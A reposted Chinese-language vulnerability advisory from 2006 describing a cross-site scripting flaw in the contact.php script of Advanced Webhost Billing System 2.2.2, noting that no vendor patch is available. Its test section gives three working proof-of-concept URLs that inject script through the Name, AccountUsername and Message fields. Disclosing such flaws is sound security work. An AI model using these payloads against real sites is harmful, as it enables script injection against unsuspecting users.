[转载]Advanced Webhost Billing System contact.php跨站脚本执行漏洞
信息来源:绿盟科技发布日期:2006-07-29
更新日期:2006-07-31
受影响系统:
Total Online Solutions AWBS 2.2.2
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 19226
Advanced Webhost Billing System(AWBS)是一款在线购物使用的计费系统。
AWBS的contact.php脚本实现上存在输入验证漏洞,远程攻击者可以利用这些漏洞执行跨站脚本执行攻击,以客户端当前用户权限执行恶意脚本代码。
<*来源:newbinaryfile ([email]newbinaryfile@gmail.com[/email])
*>
测试方法:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
http://[site adres]/contact.php?action=submit&Name='><script>alert('XSS Vulnerability')%3B</script>&EmailAddress=1&AccountUsername=1&Message=1
http://[site adres]/contact.php?action=submit&Name=1&EmailAddress=1&AccountUsername='
><script>alert('XSS Vulnerability')%3B</script>&Message=1
http://[site adres]/action=submit&Name=1&EmailAddress=1&AccountUsername=1&Message=</t
extarea><script>alert('XSS Vulnerability')%3B</script>
建议:
--------------------------------------------------------------------------------
厂商补丁:
Total Online Solutions
----------------------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
[url]http://www.awbs.com/index.php[/url]
页:
[1]